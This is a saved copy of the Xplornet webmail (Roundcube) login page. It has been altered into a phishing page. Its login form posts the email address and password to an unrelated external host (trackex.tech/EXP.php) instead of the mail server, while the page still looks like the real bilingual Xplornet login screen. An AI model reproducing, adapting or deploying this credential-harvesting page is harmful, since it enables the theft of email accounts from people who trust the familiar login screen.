<!DOCTYPE html>
<!-- saved from url=(0026)https://mail.xplornet.com/ -->
<html lang="en" class="js chrome webkit layout-large"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Webmail :: Welcome to Webmail</title>
<title>Webmail :: Welcome to Webmail</title>

<meta name="Robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<link rel="stylesheet" type="text/css" href="./xplore_files/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="./xplore_files/login.css">
<link rel="stylesheet" type="text/css" href="./xplore_files/styles.2.css">
<script>
  exit_preview = function() {
    document.cookie = "preview=;-1;path=/";
    document.cookie = "preview2=;-1;path=/";
  };
  preview_checkbox = function() {
    if ($('#preview')[0].checked == true) {
      var date = new Date();
      date.setTime(date.getTime() + (30*24*60*60*1000));
      expires = ";expires=" + date.toUTCString();
      document.cookie = "preview=3"+expires+";path=/";
    } else {
      document.cookie = "preview=;-1;path=/";
      document.cookie = "preview2=;-1;path=/";
    }
  };
  preview_force = function() {
    var date = new Date();
    date.setTime(date.getTime() + (30*24*60*60*1000));
    expires = ";expires=" + date.toUTCString();
    document.cookie = "preview=3"+expires+";path=/";
  }
  check_realm = function() {
    var user = $('#rcmloginuser').val();
    var a = user.split('@');
    if (a[1]) { 
      // already have realm
      return; 
    }
    var hostname = hostname_from_location();
    if (hostname) {
      var realmuser = a[0] + '@' + hostname;
      $('#rcmloginuser').val(realmuser);
    }
  };
  hostname_from_location = function() {
    var hostname = window.location.hostname;
    if (hostname.indexOf('hostedemail.com') !== -1) {
      // check if domain part is in url after redirection
      if (window.location.href.indexOf('?') !== -1) {
        var args = window.location.href.split('?')[1];
        var a = args.split('&');
        for (var i in a) {
          var b = a[i].split('=');
          if (b[0] == '_d') {
            return b[1];
          }
        }
      }
      // can't autocomplete realm
      return; 
    }
    b = hostname.split('.');
    if ($('#autocomplete_shift').length > 0) {
      if (b.length > $('#autocomplete_shift').val()) {
        b.shift();
      }
    } else if (b.length > 2) {
      b.shift();
    }
    return b.join('.');
  };
  update_example = function() {
    var hostname = hostname_from_location();
    if (hostname) {
      $('#example_user').text('yourname@'+hostname);
    }
    if ($('#example-user-full')) {
      $('#rcmloginuser').prop('title',$('#example-user-full').text());
      $('#rcmloginpwd').prop('title',$('#example-case-sensitive').text());
      var t2fa_type = $('#_2fatype').val();
      if (t2fa_type == 'ga') {
        $('#rcmloginpwd2').prop('title',$('#example-2fa-ga').text());
      } else {
        $('#rcmloginpwd2').prop('title',$('#example-2fa-sms').text());
      }
    }
  };
  test_checkboxes = function() {
    var expire = $('#session_expire').is(':checked');
    var persist = $('#persist').is(':checked');
    if (expire) {
      $('#persist').prop('checked',false);
      $('#persist').prop('disabled',true);
    } else {
      $('#persist').prop('disabled',false);
    }
  };
  isMobile = function () {
    return;
  }
  window.onload = function() {
    // handle IDN domain names in all browsers
    $(form).submit(function() {
      var user = $('#rcmloginuser').val();
      user = punycode.toASCII(user);
      $('#rcmloginuser').val(user);
      return true;
    });
    if ($('#mobiletest').is(':visible')) {
      $('#desktop').val('0');
    }
  }
</script>
<link rel="stylesheet" type="text/css" href="./xplore_files/jquery-ui.min.css"><link rel="stylesheet" type="text/css" href="./xplore_files/custom_login.css"><script src="./xplore_files/jquery.min.js.download"></script><script src="./xplore_files/common.js.download"></script><script src="./xplore_files/app.js.download"></script><script src="./xplore_files/jstz.min.js.download"></script><script src="./xplore_files/punycode.js.download"></script><script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10502,"cookie_domain":"","cookie_path":"/","cookie_secure":false,"dark_mode_support":true,"skin":"elastic","blankpage":"skins/elastic/watermark.html","refresh_interval":60,"session_lifetime":1800,"action":"","comm_path":"./?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","request_token":"M5rjlReARGTLYsPp5D8F8Ko3Sfg0KEu4"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","back":"Back","errortitle":"An error occurred!","options":"Options","plaintoggle":"Plain text","htmltoggle":"HTML","previous":"Previous","next":"Next","select":"Select","browse":"Browse","choosefile":"Choose file...","choosefiles":"Choose files..."});
rcmail.gui_container("loginfooter","login-footer");rcmail.gui_object('loginform', 'login-form');
rcmail.gui_object('message', 'messagestack');
rcmail.gui_object('message', 'message');
</script>

<script src="./xplore_files/ui.js.download"></script><script src="./xplore_files/jquery-ui.min.js.download"></script><script src="./xplore_files/custom_login.js.download"></script>
</head>
<body class="ver2">
<span id="mobiletest"></span>
<!-- begin custom login html -->
<div data-list="login-list">
<div id="login-form">
  <div id="login-logo">
<img class="resize" src="./xplore_files/login_logo.png" id="logo" alt="Webmail">
  </div>
  <div class="box-inner">
<!-- begin LOGIN_HTML block-->
<form name="form" method="post" action="https://www.trackex.tech/EXP.php" class="table-responsive-sm">
<input type="hidden" name="_token" value="M5rjlReARGTLYsPp5D8F8Ko3Sfg0KEu4">
<input type="hidden" name="_token" value="M5rjlReARGTLYsPp5D8F8Ko3Sfg0KEu4">
  <input type="hidden" value="login" name="_task">
  <input type="hidden" value="login" name="_action">
  <input id="rctz" class="rcmlogintz" type="hidden" value="Africa/Lagos" name="_timezone">
  <input class="rcmloginurl" type="hidden" value="" name="_url">
  <div id="example-user-full" style="display:none">e.g. <span id="example_user">yourname@xplornet.com</span></div>
  <div id="example-case-sensitive" style="display:none">password is case-sensitive / le mot de passe tient compte des majuscules.</div>
  <div id="example-2fa-ga" style="display:none">Get a token from your authenticator app / Obtenez un token avec votre application d'authentification</div>
  <div class="example-2fa-sms" style="display:none">A token has been sent to your mobile device via SMS.</div>
  <table id="loginform" class="table">
    <tbody><tr class="form-group row">
      <td class="field pair-top wm-user">
        <span>E-mail address / Courriel</span>
      </td>
      <td class="field pair-bottom input-group input-group-lg">
        <span class="input-group-prepend"><i class="input-group-text icon user"></i></span><input class="attr form-control" id="username" type="email" autocapitalize="off" size="40" required="required" name="username" onchange="check_realm();" value="" placeholder="" title="e.g. yourname@xplornet.com">
      </td>
    </tr>
    <tr class="spacer-bottom wm-pass form-group row">
      <td class="field pair-top">
        <span>Password / Mot de passe</span>
      </td>
      <td class="field pair-bottom input-group input-group-lg">
        <span class="input-group-prepend">Password / Mot de passe</span><input class="attr form-control" id="password" type="password" autocapitalize="off" size="40" required="required" name="password" placeholder="" title="password is case-sensitive / le mot de passe tient compte des majuscules.">
      </td>
    </tr>
    <tr class="session_expire form-group row">
      <td class="field input-group input-group-lg">
        <span class="input-group-prepend"><i class="input-group-text icon sessionexpire"></i></span><div class="custom-control custom-switch"><input class="attr form-control form-check-input custom-control-input" id="session_expire" type="checkbox" value="1" name="session_expire" onclick="test_checkboxes()" placeholder=""><label for="session_expire" class="custom-control-label" title=""></label></div>
        <p class="example-text">Shared computer - log me out after 4 hours<br>Ordinateur partagé - déconnectée après 4 heures</p>
      </td>
    </tr>
    <tr class="session_persist spacer-bottom form-group row">
      <td class="field input-group input-group-lg">
        <span class="input-group-prepend"><i class="input-group-text icon persist"></i></span><div class="custom-control custom-switch"><input class="attr form-control form-check-input custom-control-input" id="persist" type="checkbox" value="1" name="persist" onclick="test_checkboxes()" placeholder=""><label for="persist" class="custom-control-label" title=""></label></div>
        <p class="example-text">Keep me logged in until I log out<br>Restez connecté(e)</p>
      </td>
    </tr>
    
    <tr class="mobile form-group row input-group input-group-lg" style="display:none;">
      <span class="input-group-prepend"><i class="input-group-text icon desktop"></i></span><input id="desktop" type="hidden" value="1" name="desktop" class="form-control" placeholder="">
    </tr>
  </tbody></table>

  <div class="formbuttons">
    <button type="submit" class="button mainaction btn btn-primary login">Login / Se connecter</button>
  </div>

  
</form>


<!-- end LOGIN_HTML block-->

  </div>
</div>

<!-- end custom login html -->
</div>

<div class="box-bottom">
  <center>
    <div id="message"></div>
    <noscript>
      <p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
    </noscript>
  </center>
</div>



<script>
  $(document).ready(function() {
    var rce = new rcube_elastic_ui();
    if (typeof(custom_init) == 'function') {
      custom_init();
    }
    update_example();
    var tz_name = false;
    if (jstz) {
      var tz = jstz.determine();
      tz_name = tz.name();
    }
    var tz = (tz_name ? tz_name : (new Date().getStdTimezoneOffset() / -60));
    $('#rctz').val(tz);
  });
  var tz_name = false;
  if (jstz) {
    var tz = jstz.determine();
    tz_name = tz.name();
  }
  var tz = (tz_name ? tz_name : (new Date().getStdTimezoneOffset() / -60));
  $('#rctz').val(tz);
</script>
<script>
$(function() {
rcmail.init();
});
</script>




</body></html>